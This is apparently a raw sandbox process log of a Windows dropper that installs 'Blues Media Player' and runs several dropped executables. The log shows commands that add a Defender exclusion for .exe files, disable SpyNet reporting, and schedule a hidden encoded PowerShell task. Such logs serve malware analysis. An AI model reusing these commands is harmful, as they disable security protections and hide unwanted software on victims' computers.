  "C:\Users\Admin\AppData\Local\Temp\is-I4NO6.tmp\cfg_zRDsDL23PI.tmp" /SL5="$402E8,5596242,54272,C:\Users\Admin\AppData\Local\Temp\Temp1_cfg_zRDsDL23PI.zip\cfg_zRDsDL23PI.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious use of FindShellTrayWindow
  PID:2180
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Delete /F /TN "MUSEXT12091"
    3⤵
    PID:3608
- - C:\Program Files (x86)\Blues Media Player\BluesMediaPlayer.exe
    "C:\Program Files (x86)\Blues Media Player\BluesMediaPlayer.exe"
    3⤵
    - Executes dropped EXE
    PID:1800
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 932
      4⤵
      Program crash
      PID:5256
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 960
      4⤵
      Program crash
      PID:5144
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 140
      4⤵
      Program crash
      PID:2220
- - C:\Program Files (x86)\Blues Media Player\BluesMediaPlayer.exe
    "C:\Program Files (x86)\Blues Media Player\BluesMediaPlayer.exe" 0498baed1f08ef7f7754c109a1b44a49
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:5376
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 908
      4⤵
      Program crash
      PID:5576
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 916
      4⤵
      Program crash
      PID:2380
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 984
      4⤵
      Program crash
      PID:3684
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1068
      4⤵
      Program crash
      PID:5764
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1132
      4⤵
      Program crash
      PID:5204
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1200
      4⤵
      Program crash
      PID:2220
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1208
      4⤵
      Program crash
      PID:5440
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1356
      4⤵
      Program crash
      PID:5576
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1364
      4⤵
      Program crash
      PID:5604
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1028
      4⤵
      Program crash
      PID:5828
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 988
      4⤵
      Program crash
      PID:3552
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1672
      4⤵
      Program crash
      PID:1152
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 996
      4⤵
      Program crash
      PID:4992
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1668
      4⤵
      Program crash
      PID:1344
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1808
      4⤵
      Program crash
      PID:5192
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1684
      4⤵
      Program crash
      PID:2276
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1272
      4⤵
      Program crash
      PID:5444
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1888
      4⤵
      Program crash
      PID:1760
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1688
      4⤵
      Program crash
      PID:5572
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1700
      4⤵
      Program crash
      PID:3428
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2036
      4⤵
      Program crash
      PID:5960
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2032
      4⤵
      Program crash
      PID:5992
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2004
      4⤵
      Program crash
      PID:4624
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 896
      4⤵
      Program crash
      PID:1648
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2060
      4⤵
      Program crash
      PID:1476
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2068
      4⤵
      Program crash
      PID:3684
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2104
      4⤵
      Program crash
      PID:5988
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2116
      4⤵
      Program crash
      PID:4456
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2104
      4⤵
      Program crash
      PID:2044
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2136
      4⤵
      Program crash
      PID:6012
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1268
      4⤵
      Program crash
      PID:4852
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2144
      4⤵
      Program crash
      PID:3280
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2136
      4⤵
      Program crash
      PID:5780
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2116
      4⤵
      Program crash
      PID:5292
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2192
      4⤵
      Program crash
      PID:2220
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\BRB2Lk49\4UQ48.exe"
      4⤵
      PID:5440
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\BRB2Lk49\4UQ48.exe"
        5⤵
        
        PID:5512
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2052
      4⤵
      Program crash
      PID:5712
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\1wcBu1A2\7xi7KRrpVxmK28y.exe"
      4⤵
      PID:4224
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\1wcBu1A2\7xi7KRrpVxmK28y.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4136
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\WRDfqCMy\UECHssE.exe"
      4⤵
      PID:5932
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\WRDfqCMy\UECHssE.exe"
        5⤵
        
        PID:4460
  - - C:\Users\Admin\AppData\Local\Temp\1wcBu1A2\7xi7KRrpVxmK28y.exe
      C:\Users\Admin\AppData\Local\Temp\1wcBu1A2\7xi7KRrpVxmK28y.exe
      4⤵
      Executes dropped EXE
      PID:3664
    - - C:\Users\Admin\AppData\Local\Temp\is-IAOAI.tmp\7xi7KRrpVxmK28y.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IAOAI.tmp\7xi7KRrpVxmK28y.tmp" /SL5="$30410,7009574,54272,C:\Users\Admin\AppData\Local\Temp\1wcBu1A2\7xi7KRrpVxmK28y.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:4304
      - C:\Program Files (x86)\CRTGame\crtgame.exe
        
        "C:\Program Files (x86)\CRTGame\crtgame.exe" -s
        6⤵
        Executes dropped EXE
        
        PID:5292
      - C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" helpmsg 10
        6⤵
        
        PID:4596
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 helpmsg 10
        7⤵
        
        PID:5848
      - C:\Program Files (x86)\CRTGame\crtgame.exe
        
        "C:\Program Files (x86)\CRTGame\crtgame.exe" -i
        6⤵
        Executes dropped EXE
        
        PID:3124
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /Query
        6⤵
        
        PID:5844
  - - C:\Users\Admin\AppData\Local\Temp\BRB2Lk49\4UQ48.exe
      C:\Users\Admin\AppData\Local\Temp\BRB2Lk49\4UQ48.exe -eywhbg73luze
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6048
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2288
      4⤵
      Program crash
      PID:5824
  - - C:\Users\Admin\AppData\Local\Temp\WRDfqCMy\UECHssE.exe
      C:\Users\Admin\AppData\Local\Temp\WRDfqCMy\UECHssE.exe /sid=3 /pid=449
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:5860
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2144
      4⤵
      Program crash
      PID:1956
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2320
      4⤵
      Program crash
      PID:1692
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2272
      4⤵
      Program crash
      PID:5572
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2144
      4⤵
      Program crash
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4460
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2272
      4⤵
      Program crash
      PID:2600
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2292
      4⤵
      Program crash
      PID:1684
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2300
      4⤵
      Program crash
      PID:5444
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2332
      4⤵
      Program crash
      PID:4528
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2300
      4⤵
      Program crash
      PID:5848
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2348
      4⤵
      Program crash
      PID:4596
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1888
      4⤵
      Program crash
      PID:1692
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2036
      4⤵
      Program crash
      PID:5672
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2328
      4⤵
      Program crash
      PID:5568
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2072
      4⤵
      Program crash
      PID:5824
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\vB4SAinP\hdTeYo3.exe"
      4⤵
      PID:5564
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\vB4SAinP\hdTeYo3.exe"
        5⤵
        
        PID:5864
  - - C:\Users\Admin\AppData\Local\Temp\vB4SAinP\hdTeYo3.exe
      C:\Users\Admin\AppData\Local\Temp\vB4SAinP\hdTeYo3.exe /did=757674 /S
      4⤵
      PID:5692
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        5⤵
        
        PID:2196
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        6⤵
        
        PID:2292
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        7⤵
        
        PID:432
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        7⤵
        
        PID:3136
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        5⤵
        
        PID:5684
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        6⤵
        
        PID:412
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        7⤵
        
        PID:2600
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        7⤵
        
        PID:4036
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gYnSEYnit" /SC once /ST 02:37:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        5⤵
        Creates scheduled task(s)
        
        PID:1212
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gYnSEYnit"
        5⤵
        
        PID:5544
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2736
      4⤵
      Program crash
      PID:5980
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\EDOig7XK\2z1TmO5YSzPGAQKemRVq.exe"
      4⤵
      PID:4360
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\EDOig7XK\2z1TmO5YSzPGAQKemRVq.exe"
        5⤵
        
        PID:3940
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2716
      4⤵
      Program crash
      PID:3560
  - - C:\Users\Admin\AppData\Local\Temp\EDOig7XK\2z1TmO5YSzPGAQKemRVq.exe
      C:\Users\Admin\AppData\Local\Temp\EDOig7XK\2z1TmO5YSzPGAQKemRVq.exe --silent --allusers=0
      4⤵
      PID:2124
    - - C:\Users\Admin\AppData\Local\Temp\EDOig7XK\2z1TmO5YSzPGAQKemRVq.exe
        
        C:\Users\Admin\AppData\Local\Temp\EDOig7XK\2z1TmO5YSzPGAQKemRVq.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.34 --initial-client-data=0x310,0x314,0x318,0x2ec,0x31c,0x722e74f0,0x722e7500,0x722e750c
        5⤵
        
        PID:6008
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\2z1TmO5YSzPGAQKemRVq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\2z1TmO5YSzPGAQKemRVq.exe" --version
        5⤵
        
        PID:3044
    - - C:\Users\Admin\AppData\Local\Temp\EDOig7XK\2z1TmO5YSzPGAQKemRVq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\EDOig7XK\2z1TmO5YSzPGAQKemRVq.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2124 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231210182410" --session-guid=17f9a63e-67c0-4f44-a46d-85752b9b2fdc --server-tracking-blob=Njk2M2M2MmM1NjJiZmUwOTkyZWE5ZmVlMjczMTdlNDliYjFkODNmYmMzY2FiMmU3N2ExOTk5NmFjZWNjMzg4Njp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwMjIzMjYxMS43OTk3IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiIwOTg3ZjQ5OS1iMzYyLTRiZTYtYjEyZC0zMThkMmQxMmExNmUifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=A405000000000000
        5⤵
        
        PID:5556
      - C:\Users\Admin\AppData\Local\Temp\EDOig7XK\2z1TmO5YSzPGAQKemRVq.exe
        
        C:\Users\Admin\AppData\Local\Temp\EDOig7XK\2z1TmO5YSzPGAQKemRVq.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.34 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x717074f0,0x71707500,0x7170750c
        6⤵
        
        PID:2084
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2764
      4⤵
      Program crash
      PID:3060
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 2796
      4⤵
      Program crash
      PID:5164
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Query
    3⤵
    PID:5564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1800 -ip 1800
1⤵
PID:6048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1800 -ip 1800
1⤵
PID:5204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1800 -ip 1800
1⤵
PID:556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5376 -ip 5376
1⤵
PID:5456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5376 -ip 5376
1⤵
PID:4240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5376 -ip 5376
1⤵
PID:3260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5376 -ip 5376
1⤵
PID:764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5376 -ip 5376
1⤵
PID:5784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5376 -ip 5376
1⤵
PID:5220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5376 -ip 5376
1⤵
PID:2840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5376 -ip 5376
1⤵
PID:5548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5376 -ip 5376
1⤵
PID:2708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5376 -ip 5376
1⤵
PID:5904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5376 -ip 5376
1⤵
PID:5452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5376 -ip 5376
1⤵
PID:5416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5376 -ip 5376
1⤵
PID:4304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5376 -ip 5376
1⤵
PID:2740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5376 -ip 5376
1⤵
PID:4828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5376 -ip 5376
1⤵
PID:5516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5376 -ip 5376
1⤵
PID:3044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5376 -ip 5376
1⤵
PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5376 -ip 5376
1⤵
PID:5712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5376 -ip 5376
1⤵
PID:4528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5376 -ip 5376
1⤵
PID:4468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5376 -ip 5376
1⤵
PID:5868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5376 -ip 5376
1⤵
PID:1692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5376 -ip 5376
1⤵
PID:3892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5376 -ip 5376
1⤵
PID:5804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5376 -ip 5376
1⤵
PID:2084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5376 -ip 5376
1⤵
PID:2240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5376 -ip 5376
1⤵
PID:1540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5376 -ip 5376
1⤵
PID:6112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5376 -ip 5376
1⤵
PID:5480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5376 -ip 5376
1⤵
PID:5188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5376 -ip 5376
1⤵
PID:2564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5376 -ip 5376
1⤵
PID:3576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5376 -ip 5376
1⤵
PID:1264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5376 -ip 5376
1⤵
PID:5504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5376 -ip 5376
1⤵
PID:1304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5376 -ip 5376
1⤵
PID:6132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5376 -ip 5376
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5376 -ip 5376
1⤵
PID:3368

C:\Program Files\WProxy\WinProxy\WinProxy.exe
"C:\Program Files\WProxy\WinProxy\WinProxy.exe"
1⤵
PID:6120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5376 -ip 5376
1⤵
PID:5568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5376 -ip 5376
